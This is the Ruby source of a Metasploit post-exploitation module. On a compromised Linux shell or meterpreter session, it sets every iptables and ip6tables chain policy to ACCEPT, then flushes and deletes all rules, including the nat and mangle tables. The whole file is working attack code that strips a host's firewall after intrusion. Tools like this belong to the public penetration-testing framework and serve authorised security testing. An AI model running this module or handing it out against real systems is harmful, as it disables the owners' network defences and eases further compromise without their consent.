## # This module requires Metasploit: https://metasploit.com/download # Current source: https://github.com/rapid7/metasploit-framework ## class MetasploitModule < Msf::Post include Msf::Post::File include Msf::Post::Linux::System def initialize super( 'Name' => 'IPTABLES rules removal', 'Description' => %q{ This module will be applied on a session connected to a shell. It will remove all IPTABLES rules. }, 'Author' => 'Alberto Rafael Rodriguez Iglesias ', 'License' => MSF_LICENSE, 'Platform' => ['linux'], 'SessionTypes' => ['shell', 'meterpreter'] ) end def run if command_exists?('iptables') print_good('Deleting IPTABLES rules...') cmd_exec('iptables -P INPUT ACCEPT') cmd_exec('iptables -P FORWARD ACCEPT') cmd_exec('iptables -P OUTPUT ACCEPT') cmd_exec('iptables -t nat -F') cmd_exec('iptables -t mangle -F') cmd_exec('iptables -F') cmd_exec('iptables -X') print_good('iptables rules successfully executed') else print_line('iptables rules could not be executed') end if command_exists?('ip6tables') print_good('Deleting IP6TABLES rules...') cmd_exec('ip6tables -P INPUT ACCEPT') cmd_exec('ip6tables -P FORWARD ACCEPT') cmd_exec('ip6tables -P OUTPUT ACCEPT') cmd_exec('ip6tables -t nat -F') cmd_exec('ip6tables -t mangle -F') cmd_exec('ip6tables -F') cmd_exec('ip6tables -X') print_good('ip6tables rules successfully executed') else print_line('ip6tables rules could not be executed') end end end